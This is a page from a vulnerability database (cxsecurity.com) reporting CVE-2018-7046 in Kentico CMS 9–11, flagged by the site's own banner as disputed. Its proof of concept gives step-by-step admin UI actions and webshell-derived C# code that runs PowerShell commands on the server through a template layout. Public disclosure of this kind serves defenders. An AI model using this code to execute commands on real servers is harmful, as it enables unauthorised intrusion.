WARNING! Fake news / Uwaga! Nota nieprawdziwa

Kentico CMS 11 Arbitrary Code Execution

2018.02.19
Credit: Keerati T.
Risk: High
Local: No
Remote: Yes
CWE: CWE-78


Ogólna skala CVSS: 9/10
Znaczenie: 10/10
Łatwość wykorzystania: 8/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Jednorazowa
Wpływ na poufność: Pełny
Wpływ na integralność: Pełny
Wpływ na dostępność: Pełny

# Exploit Title: Kentico CMS version 9 through 11 - Arbitrary Code Execution # Date: 17-02-2018 # Software Link: https://www.kentico.com # Exploit Author: Keerati T. # CVE: CVE-2018-7046 # Category: webapps 1. Description Kentico is the only fully integrated ASP.NET CMS, E-commerce, and Online Marketing platform that allows you to create cutting-edge websites and optimize your digital customers experiences fully across multiple channels. Kentico saves you time and resources so you can accomplish more. (Copy from Kentico homepage.) 2. Proof of Concept In case of no product to install you can request Hosted Trial at https://www.kentico.com/download-demo/hosted-trial (Vendor message: Hosted trials are virtual applications running isolated and are limited by application pool permission set on server level so they should be safe as well.) 2.1 Log in as administrator. 2.2 Go to page. 2.3 At "Edit" on left panel, select any page under site. 2.4 Click "Template" tab locate on top right panel. 2.5 Under "Template" tab, select "Edit template properties". 2.6 Select "Layout" on popped "Template". 2.7 Fill the following c# code into text box. (modified from https://github.com/samratashok/nishang/blob/master/Antak-WebShell/antak.aspx) ================================ <%@ Import Namespace="System.Diagnostics" %> <%@ Import Namespace="System.IO" %> <%@ Import Namespace="System.IO.Compression" %> <%@ Import Namespace="Microsoft.VisualBasic" %> ProcessStartInfo psi = new ProcessStartInfo(); psi.FileName = "powershell.exe"; psi.Arguments = "-noninteractive -executionpolicy bypass ipconfig"; psi.RedirectStandardOutput = true; psi.UseShellExecute = false; Process p = Process.Start(psi); StreamReader stmrdr = p.StandardOutput; string s = stmrdr.ReadToEnd(); Response.Write(s); stmrdr.Close(); ================================ 2.8 Click "Save" and see the response of issued OS commands. 3. Timeline 3.1 Discovery and report - 14 Feb 2018. 3.2 Vendor response - 14 Feb 2018. (This is actually intended functinality and our CMS allows authenticated users to edit and update ascx code layout. However this user has to be authentication and has to have permissions for these actions in our administration interface. ) 3.3 CVE ID was assigned - 15 Feb 2018. 3.4 Public - 17 Feb 2018. 4. Solution Restricting the permission to allow only authorized user to edit ascot code layout.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top